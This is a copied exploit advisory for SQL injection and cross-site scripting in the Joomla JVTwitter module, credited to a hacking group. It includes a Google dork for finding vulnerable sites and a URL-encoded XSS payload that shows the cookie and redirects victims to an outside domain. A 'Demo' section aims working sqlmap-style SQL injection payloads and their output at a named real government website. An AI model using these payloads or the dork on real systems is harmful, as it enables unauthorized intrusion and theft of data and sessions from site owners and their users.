Below is a copy: Joomla JVTwitter - SQL Injection & XSS Vulnerabilities
#############################################################
# Exploit Title: Joomla JVTwitter - SQL Injection & XSS Vulnerabilities
# Google Dork: inurl:mod_jvtwitter/jvtwitter.php?id=
# Date: 2020-11-07
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: joomlavi.com
# Software Version: *
# Software Link: https://joomlavi.com/documentation/joomla-extensions/jv-twitter.html
# Tested on: Linux 4.14.117-perf+ #2 SMP PREEMPT CST 2020 aarch64 Android
#############################################################
[*] Vuln Info:
==============
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
Cross-Site Scripting or XSS attack is a security exploitation in which an attacker places malicious client-end code into a web page.
Attackers using XSS vulnerabilities steal user data, or control user sessions, run malicious code or even use it as a major component of phishing scams.
#############################################################
[*] Exploit:
============
/modules/mod_jvtwitter/jvtwitter.php?id=[Number][SQL-I]
/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E
#############################################################
[*] Demo:
=========
https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=110
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=110 AND 6499=6499-- xBNX
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=110 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x7178707171,(SELECT (ELT(7924=7924,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Anel
---
[08:01:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E
#############################################################
[*] Contact:
============
# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan_cxs
# Twitter: twitter.com/Gh05t666nero1
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum